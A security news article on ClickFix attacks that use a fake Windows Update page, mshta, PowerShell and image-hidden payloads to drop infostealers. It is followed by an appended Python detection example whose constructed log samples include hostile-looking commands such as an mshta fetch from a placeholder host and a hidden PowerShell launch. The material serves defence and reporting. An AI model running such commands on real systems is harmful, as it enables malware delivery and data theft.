Wednesday, December 3, 2025

ClickFix attack uses fake Windows Update screen to push malware

ClickFix attack variants have been observed where threat actors trick users with a realistic-looking Windows Update animation in a full-screen browser page and hide the malicious code inside images.

ClickFix is a social-engineering attack in which users are convinced to paste and execute, in the Windows Command Prompt, code or commands that result in malware running on the system.

The attack has been widely adopted by cybercriminals across all tiers because of its high effectiveness, and it has continually evolved, with increasingly sophisticated and deceptive lures.


Fullscreen browser page

Since October 1st, researchers have observed ClickFix attacks where the pretext for executing dangerous commands was completing the installation of a critical Windows security update, alongside the more common “human verification” lure [1, 2].

The fake update page instructs victims to press specific keys in a certain sequence, which pastes and executes attacker commands that were automatically copied to the clipboard via JavaScript running on the site.

Fake Windows security update screen (Source: BleepingComputer)

A report from managed security services provider Huntress notes that the new ClickFix variants drop the LummaC2 and Rhadamanthys information stealers.

In one variant, the attackers use a human verification page, while in another they rely on the fake Windows Update screen.

In both cases, though, the threat actors used steganography to encode the final malware payload inside an image.

“Rather than simply appending malicious data to a file, the malicious code is encoded directly within the pixel data of PNG images, relying on specific color channels to reconstruct and decrypt the payload in memory,” Huntress researchers explain.

Delivering the final payload begins with using the mshta Windows-native binary to execute malicious JavaScript code.

The whole process involves multiple stages that use PowerShell code and a .NET assembly (the Stego Loader) responsible for reconstructing the final payload, which is embedded within a PNG file in an encrypted state.

Inside Stego Loader’s manifest resources, there is an AES-encrypted blob that is actually a steganographic PNG file containing shellcode, which is reconstructed using custom C# code.

Huntress researchers noticed that the threat actor used a dynamic evasion tactic, known as ctrampoline, where the entry point function started by calling 10,000 empty functions.

Trampoline call chain (Source: Huntress)

The shellcode holding the infostealer samples is extracted from the encrypted image and is packed using the Donut tool, which allows executing VBScript, JScript, EXE, DLL files, and .NET assemblies in memory.

After unpacking, Huntress researchers were able to retrieve the malware, which in the analyzed attacks was LummaC2 and Rhadamanthys.

The diagram below serves as a visual illustration of how the entire attack works:

Overview of the attack (Source: Huntress)

The Rhadamanthys variant that used the Windows Update lure was first observed by researchers back in October, before Operation Endgame took down parts of its infrastructure on November 13.

Huntress reports that the law enforcement operation resulted in the payload no longer being delivered on the fake Windows Update domains, which are still active.

To stay protected from this type of ClickFix attack, the researchers recommend disabling the Windows Run box and monitoring for suspicious process chains, such as explorer.exe spawning mshta.exe or PowerShell.

Additionally, when investigating a cybersecurity incident, analysts can check the RunMRU registry key to see whether the user entered commands in the Windows Run box.
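The two defensive checks above (flagging explorer.exe spawning mshta.exe or PowerShell, and reading the RunMRU history of the Run box) as an added example that is not code from the article or from Huntress. The event layout is a constructed Sysmon-like key=value format, the sample events and RunMRU values are constructed, and the RunMRU encoding (one-letter values ending in `\1`, ordered most-recent-first by `MRUList`) is assumed to match what Windows writes.

```python
"""Added example: detection helpers for the ClickFix indicators the article names
(explorer.exe -> mshta.exe/powershell.exe chains, and the RunMRU Run-box history)."""
import re
from typing import Dict, List

# Parent/child basename pairs the article recommends monitoring for.
SUSPICIOUS_CHAINS = {("explorer.exe", "mshta.exe"), ("explorer.exe", "powershell.exe")}

# Constructed process-creation events in a Sysmon-like key=value layout (not real telemetry).
SAMPLE_EVENTS = """\
ParentImage=C:\\Windows\\explorer.exe Image=C:\\Windows\\System32\\mshta.exe CommandLine="mshta https://example.invalid/update"
ParentImage=C:\\Windows\\explorer.exe Image=C:\\Windows\\System32\\notepad.exe CommandLine="notepad"
ParentImage=C:\\Windows\\explorer.exe Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe CommandLine="powershell -w hidden"
ParentImage=C:\\Windows\\System32\\cmd.exe Image=C:\\Windows\\System32\\mshta.exe CommandLine="mshta"
"""
FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')

def parse_event(line: str) -> Dict[str, str]:
    """Split one key=value event line into a dict; quoted values keep their spaces."""
    return {k: v.strip('"') for k, v in FIELD_RE.findall(line)}

def suspicious_chains(log: str) -> List[Dict[str, str]]:
    """Return the events whose (parent, child) image basenames form a flagged chain."""
    hits = []
    for line in log.splitlines():
        ev = parse_event(line)
        parent = ev.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
        child = ev.get("Image", "").rsplit("\\", 1)[-1].lower()
        if (parent, child) in SUSPICIOUS_CHAINS:
            hits.append(ev)
    return hits

# Constructed RunMRU data (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU).
# Assumed layout: each Run-box command is a one-letter value ending in "\1", and MRUList
# lists the letters most-recent-first.
SAMPLE_RUNMRU = {"MRUList": "cab", "a": "notepad\\1", "b": "calc\\1",
                 "c": "mshta https://example.invalid/update\\1"}

def runmru_history(values: Dict[str, str]) -> List[str]:
    """Run-box commands in most-recent-first order, trailing \\1 marker removed."""
    order = values.get("MRUList", "")
    return [values[k].removesuffix("\\1") for k in order if k in values]

def runmru_hits(values: Dict[str, str], lolbins=("mshta", "powershell")) -> List[str]:
    """Run-box commands whose first token is one of the binaries the article calls out."""
    return [c for c in runmru_history(values)
            if c.split(" ", 1)[0].lower().removesuffix(".exe") in lolbins]
```

On a live host the RunMRU values would come from `winreg` rather than the constructed dict, and the process events from your EDR or Sysmon pipeline.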
